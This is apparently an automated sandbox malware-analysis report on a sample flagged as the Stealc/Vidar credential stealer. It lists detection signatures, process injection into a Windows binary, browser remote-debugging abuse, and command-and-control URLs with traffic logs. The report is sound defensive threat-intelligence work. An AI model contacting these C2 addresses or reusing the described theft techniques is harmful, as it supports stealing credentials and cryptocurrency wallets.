Windows Analysis Report
S0FTWARE.exe

Overview

General Information

Sample name:S0FTWARE.exe
Analysis ID:1560256
MD5:0da768d82b6b4b1ce65f888d4191a228
SHA1:0c040af6c4702c1efc41de91c8c670a33f91f7c1
SHA256:52d6508cc82d8084af7ed3097832a425678837366b171945a47b3d6a76f448ff
Tags:exeuser-4k95m
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • S0FTWARE.exe (PID: 8056 cmdline: "C:\Users\user\Desktop\S0FTWARE.exe" MD5: 0DA768D82B6B4B1CE65F888D4191A228)
    • BitLockerToGo.exe (PID: 7684 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 2508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2268,i,3846380570938654004,26334187060056597,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 2360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 3656 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2320,i,9641244863575168474,7710836502246451740,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 6596 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1464 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3052 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7228 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7088 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3776 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5220 --field-trial-handle=2040,i,6971755058969874143,14166415319364147513,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["https://steamcommunity.com/profiles/76561199802540894", "https://t.me/fu4chmo"], "Botnet": "635b5ceb8ed09951eb8d5e776815ad72"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security

Source | Rule | Description | Author
00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

Source | Rule | Description | Author
3.2.BitLockerToGo.exe.8e0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
3.2.BitLockerToGo.exe.8e0000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
3.2.BitLockerToGo.exe.8e0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.S0FTWARE.exe.1170fec0.5.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.S0FTWARE.exe.1170fec0.5.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

                          System Summary

                          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 7684, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2508, ProcessName: chrome.exe
                          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                          2024-11-21T15:48:02.385968+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 49.13.32.95 | 443 | 192.168.2.8 | 49715 | TCP
                          2024-11-21T15:48:04.837402+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 49.13.32.95 | 443 | 192.168.2.8 | 49717 | TCP
                          2024-11-21T15:48:04.837219+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.8 | 49717 | 49.13.32.95 | 443 | TCP

                          AV Detection

                          Source: https://mvce45.cyou/vcruntime140.dllAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/Avira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/sT$Avira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/lEAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/CDuAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/MaAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/sAvira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/000Avira URL Cloud: Label: malware
                          Source: https://mvce45.cyou/bAvira URL Cloud: Label: malware
                          Source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199802540894", "https://t.me/fu4chmo"], "Botnet": "635b5ceb8ed09951eb8d5e776815ad72"}
                          Source: S0FTWARE.exeReversingLabs: Detection: 57%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: S0FTWARE.exeJoe Sandbox ML: detected
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E92A6 CryptUnprotectData,LocalAlloc,LocalFree,3_2_008E92A6
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F3AB9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_008F3AB9
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EB721 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat,3_2_008EB721
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C986C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C986C80
                          Source: S0FTWARE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                          Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49711 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.13.32.95:443 -> 192.168.2.8:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.8:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.8:49738 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.8:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.53.18:443 -> 192.168.2.8:49752 version: TLS 1.2
                          Source: S0FTWARE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: freebl3.pdb source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: BitLockerToGo.pdb source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb@ source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.2692003466.00000000337C3000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: BitLockerToGo.exe, 00000003.00000002.2686848782.00000000278ED000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: BitLockerToGo.exe, 00000003.00000002.2677007571.00000000156A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2680691933.000000001B618000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp, mozglue.dll.3.dr
                          Source: Binary string: BitLockerToGo.pdbGCTL source: S0FTWARE.exe, 00000000.00000002.1628010774.00000000114A2000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EA941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EA941
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F7178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_008F7178
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F6A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_008F6A05
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EE5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EE5B9
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EC528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_008EC528
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F7D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008F7D20
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E1D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008E1D70
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008ECE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_008ECE96
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EC888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EC888
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F785A GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_008F785A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F8D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperation,FindNextFileA,FindClose,3_2_008F8D90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EDD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_008EDD2A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F6E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_008F6E7F
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_008E149D
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_008E149D
                          Source: chrome.exeMemory has grown: Private usage: 0MB later: 38MB

                          Networking

                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:49717 -> 49.13.32.95:443
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.13.32.95:443 -> 192.168.2.8:49717
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.13.32.95:443 -> 192.168.2.8:49715
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199802540894
                          Source: Malware configuration extractorURLs: https://t.me/fu4chmo
                          Source: global trafficHTTP traffic detected: GET /fu4chmo HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                          Source: Joe Sandbox ViewIP Address: 20.25.227.174 20.25.227.174
                          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                          Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                          Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.16.229.162
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E688F InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_008E688F
                          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K5TeakZvcdonXR3&MD=a3Dubbab HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /fu4chmo HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K5TeakZvcdonXR3&MD=a3Dubbab HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /sqlo.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                          Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
